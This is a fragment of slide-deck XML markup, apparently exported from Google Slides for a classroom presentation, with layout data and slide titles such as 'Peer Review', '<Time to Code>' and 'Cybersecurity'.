              <a:alpha val="71372"/>
            </a:srgbClr>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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1046" name="Google Shape;1046;p82"/>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7" name="Google Shape;1047;p8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048" name="Google Shape;1048;p82"/>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marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="6400"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Time For a Quick Video</a:t>
            </a:r>
            <a:endParaRPr sz="6400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1049" name="Google Shape;1049;p82"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7640410" y="7314933"/>
            <a:ext cx="8696100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1050" name="Google Shape;1050;p82"/>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82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="11466614" y="3295466"/>
            <a:ext cx="1477933" cy="1277867"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="71372"/>
            </a:srgbClr>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82"/>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Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1054" name="Google Shape;1054;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377674" cy="13712428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1055" name="Google Shape;1055;p83"/>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rgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="25600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="25600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
                <a:latin typeface="Amatic SC"/>
                <a:ea typeface="Amatic SC"/>
                <a:cs typeface="Amatic SC"/>
                <a:sym typeface="Amatic SC"/>
              </a:rPr>
              <a:t>Peer Review</a:t>
            </a:r>
            <a:endParaRPr sz="25600" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
              <a:latin typeface="Amatic SC"/>
              <a:ea typeface="Amatic SC"/>
              <a:cs typeface="Amatic SC"/>
              <a:sym typeface="Amatic SC"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;p8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57"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p84"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4917184" y="1581200"/>
            <a:ext cx="18238918" cy="11634970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p84"/>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12000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12000" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Inconsolata"/>
                <a:ea typeface="Inconsolata"/>
                <a:cs typeface="Inconsolata"/>
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>&lt;Time to Code&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="12000" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Inconsolata"/>
              <a:ea typeface="Inconsolata"/>
              <a:cs typeface="Inconsolata"/>
              <a:sym typeface="Inconsolata"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p8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2"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1063" name="Google Shape;1063;p2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64" name="Google Shape;1064;p2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9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9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65" name="Google Shape;1065;p28"/>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066" name="Google Shape;1066;p28"/>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067" name="Google Shape;1067;p2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8"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1069" name="Google Shape;1069;p8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70"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1071" name="Google Shape;1071;p86"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1072" name="Google Shape;1072;p86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1073" name="Google Shape;1073;p86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1074" name="Google Shape;1074;p8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075" name="Google Shape;1075;p8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076" name="Google Shape;1076;p8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8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8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9" name="Google Shape;1079;p8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80" name="Google Shape;1080;p8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81" name="Google Shape;1081;p8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82" name="Google Shape;1082;p86"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1083" name="Google Shape;1083;p8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4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084" name="Google Shape;1084;p86"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69"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Google Shape;70;p3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71" name="Google Shape;71;p34"/>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Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr sz="4800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="73" name="Google Shape;73;p34"/>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74" name="Google Shape;74;p3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5" name="Google Shape;75;p3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76" name="Google Shape;76;p3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77" name="Google Shape;77;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1807557" y="3072384"/>
            <a:ext cx="6094420" cy="4509867"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Google Shape;78;p3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5"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1086" name="Google Shape;1086;p87" descr="Google Shape;802;p192"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="32151"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027240" y="11035278"/>
            <a:ext cx="3202713" cy="2141038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1087" name="Google Shape;1087;p87"/>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088" name="Google Shape;1088;p87"/>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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;p88"/>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1" name="Google Shape;1091;p88"/>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2" name="Google Shape;1092;p88"/>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3" name="Google Shape;1093;p88"/>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4" name="Google Shape;1094;p88"/>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5" name="Google Shape;1095;p88"/>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096" name="Google Shape;1096;p88"/>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7" name="Google Shape;1097;p88"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1098" idx="0"/>
            <a:endCxn id="1099"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100" name="Google Shape;1100;p88"/>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101" name="Google Shape;1101;p88"/>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102" name="Google Shape;1102;p88"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1103" name="Google Shape;1103;p88"/>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4" name="Google Shape;1104;p88"/>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5" name="Google Shape;1105;p88"/>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6" name="Google Shape;1106;p88"/>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7" name="Google Shape;1107;p88"/>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8" name="Google Shape;1108;p88"/>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09" name="Google Shape;1109;p88"/>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10" name="Google Shape;1110;p88"/>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11" name="Google Shape;1111;p88"/>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099" name="Google Shape;1099;p88"/>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12" name="Google Shape;1112;p88"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p88"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p88"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1115"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1116" name="Google Shape;1116;p88"/>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17" name="Google Shape;1117;p88"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1118" name="Google Shape;1118;p88"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1119" idx="0"/>
            <a:endCxn id="1120"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1120" name="Google Shape;1120;p88"/>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19" name="Google Shape;1119;p88"/>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098" name="Google Shape;1098;p88"/>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15" name="Google Shape;1115;p88"/>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17"/>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600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2800" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p88"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122" name="Google Shape;1122;p88"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1123" name="Google Shape;1123;p88"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1124"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470"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1125" name="Google Shape;1125;p88"/>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24" name="Google Shape;1124;p88"/>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
        <p:nvSpPr>
          <p:cNvPr id="1126" name="Google Shape;1126;p88"/>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25"/>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7600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="3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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p89"/>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9" name="Google Shape;1129;p89"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1130" name="Google Shape;1130;p89"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1131" name="Google Shape;1131;p8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132" name="Google Shape;1132;p8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133" name="Google Shape;1133;p8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8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8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6" name="Google Shape;1136;p8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7" name="Google Shape;1137;p8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8" name="Google Shape;1138;p8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9" name="Google Shape;1139;p89"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1140" name="Google Shape;1140;p89"/>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4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141" name="Google Shape;1141;p89"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42" name="Google Shape;1142;p89"/>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143" name="Google Shape;1143;p89"/>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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1145" name="Google Shape;1145;p90"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1146" name="Google Shape;1146;p90"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1147" name="Google Shape;1147;p9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148" name="Google Shape;1148;p9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149" name="Google Shape;1149;p9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9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9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9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3" name="Google Shape;1153;p9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4" name="Google Shape;1154;p9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5" name="Google Shape;1155;p90"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1156" name="Google Shape;1156;p90"/>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4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157" name="Google Shape;1157;p90"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58" name="Google Shape;1158;p90"/>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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p91"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="5814"/>
            <a:ext cx="23513873" cy="13485748"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13485748"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="1161" name="Google Shape;1161;p91"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="228870"/>
              <a:ext cx="23520930" cy="13256877"/>
              <a:chOff x="0" y="-1"/>
              <a:chExt cx="23520930" cy="13256877"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1162" name="Google Shape;1162;p9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163" name="Google Shape;1163;p9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164" name="Google Shape;1164;p9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9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9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9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8" name="Google Shape;1168;p9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9" name="Google Shape;1169;p9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70" name="Google Shape;1170;p91"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="20968243" y="-1"/>
              <a:ext cx="1898100" cy="1898100"/>
              <a:chOff x="-1" y="-1"/>
              <a:chExt cx="1898100" cy="1898100"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1171" name="Google Shape;1171;p91"/>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4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172" name="Google Shape;1172;p91"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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p92"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1176" name="Google Shape;1176;p9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177" name="Google Shape;1177;p9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178" name="Google Shape;1178;p9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9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9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9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2" name="Google Shape;1182;p9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3" name="Google Shape;1183;p9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4" name="Google Shape;1184;p9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185" name="Google Shape;1185;p9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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1187" name="Google Shape;1187;p93"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1188" name="Google Shape;1188;p9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189" name="Google Shape;1189;p9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190" name="Google Shape;1190;p9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9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9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9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4" name="Google Shape;1194;p9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5" name="Google Shape;1195;p9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6" name="Google Shape;1196;p93"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1197" name="Google Shape;1197;p93"/>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98" name="Google Shape;1198;p93"/>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99" name="Google Shape;1199;p9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00" name="Google Shape;1200;p93"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201"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202" name="Google Shape;1202;p94"/>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Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1203" name="Google Shape;1203;p94"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1204" name="Google Shape;1204;p9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205" name="Google Shape;1205;p9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206" name="Google Shape;1206;p9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9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9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9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10" name="Google Shape;1210;p9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11" name="Google Shape;1211;p9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2" name="Google Shape;1212;p94"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1213" name="Google Shape;1213;p94"/>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214" name="Google Shape;1214;p94"/>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15" name="Google Shape;1215;p9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16" name="Google Shape;1216;p9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7"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1218" name="Google Shape;1218;p95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1219" name="Google Shape;1219;p9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220" name="Google Shape;1220;p9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221" name="Google Shape;1221;p9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9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9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4" name="Google Shape;1224;p9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5" name="Google Shape;1225;p9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6" name="Google Shape;1226;p9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7" name="Google Shape;1227;p95"/>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228" name="Google Shape;1228;p95"/>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29" name="Google Shape;1229;p95"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30"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p96"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="437040" y="234686"/>
            <a:ext cx="23513873" cy="13256877"/>
            <a:chOff x="0" y="-1"/>
            <a:chExt cx="23520930" cy="13256877"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1232" name="Google Shape;1232;p9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233" name="Google Shape;1233;p9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234" name="Google Shape;1234;p9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9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9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7" name="Google Shape;1237;p9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8" name="Google Shape;1238;p9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9" name="Google Shape;1239;p9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40" name="Google Shape;1240;p96"/>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241" name="Google Shape;1241;p96"/>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42" name="Google Shape;1242;p96"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79"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
